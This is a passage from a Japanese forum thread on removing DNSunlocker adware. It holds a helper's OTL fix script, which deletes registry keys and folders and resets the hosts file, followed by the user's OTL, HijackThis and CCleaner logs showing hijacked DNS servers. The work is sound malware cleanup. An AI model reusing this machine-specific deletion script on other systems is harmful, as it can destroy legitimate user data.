しばらく待って処置ができたらPCを通常モードで再起動すると、またOTLのログが出るはずなので、それを保存してから、しばらく様子見の後、OTLのログとともに状態報告をレスください。
OTLのスクリプトは以下になります。破線(-----)を含まない箇所を丸ごとコピーして、それをOTLに貼って作業してください
------------------------------------------
:OTL
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ja-jp/?ocid=iehp
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = ja-JP
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes,DefaultScope = {C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\kaito\AppData\Roaming\Super PC Cleaner
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

:Files
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave
C:\Users\kaito\AppData\Roaming\Super PC Cleaner
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
C:\Users\【ユーザー名】\Documents\Bandicam

:Commands
[purity]
[resethosts]
[emptytemp]
[createrestorepoint]
[reboot]
------------------------------------------
  • 悪代官
  • 2015/09/15 (Tue) 21:45:50
返信フォームへ 
Re: DNSunlockerの感染
スキャンが完了しました、近況報告ですが以前と変りなく問題なく使えています。

以下にログを貼ります。

All processes killed
========== OTL ==========
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}\ not found.
HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache| /E : value set successfully!
HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache AcceptLangs| /E : value set successfully!
HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}\ not found.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_platform_specific\x86-64_ja folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_platform_specific folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_metadata folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\audio folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner\WL folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7\x64\x64 folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7\x64 folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT\BANDICAM folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT folder moved successfully.
C:\Users\【ユーザー名】\Documents\Bandicam folder moved successfully.
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg folder moved successfully.
Invalid Switch: b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave
File\Folder C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner not found.
File\Folder C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 not found.
File\Folder C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT not found.
File\Folder C:\Users\【ユーザー名】\Documents\Bandicam not found.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 156068 bytes
->Temporary Internet Files folder emptied: 33191 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 2796055 bytes
->Google Chrome cache emptied: 373887843 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 637179 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 50503 bytes
RecycleBin emptied: 7668795 bytes

Total Files Cleaned = 367.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09162015_184146

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/16 (Wed) 18:46:10
返信フォームへ 
ここで全体の再確認です
作業と報告、ご苦労様です。

>近況報告ですが以前と変りなく問題なく使えています。

はい、ログも見せていただきましたが、OTLで処置できるものはできたようです。

それではOTLも導入時の説明に沿って片付けた後、全体の状態をログから見直します。
またCCで各タブのログとインストール情報ログとHJTログを取り直して、それらをまた見せてください
  • 悪代官
  • 2015/09/16 (Wed) 21:08:19
返信フォームへ 
Re: DNSunlockerの感染
>はい、ログも見せていただきましたが、OTLで処置できるものはできたようです。
解決に向かっているようで少し安心しました。

ではログを貼っていきます。


hjt----------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 23:02:05, on 2015/09/16
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 40.0.3 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe
C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12064 bytes


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc ie---------------------------

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
無効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
無効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc fire fox----------------------

有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 40.0.3 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.13 default Firefox 40.0.3 C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 40.0.3 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 40.0.3 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 18.0.0.232 Adobe Systems Incorporated default Firefox 40.0.3 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 40.0.3 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc chorome---------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Adblock Plus 1.9.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0


cc スケジュールされたタスク--------------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
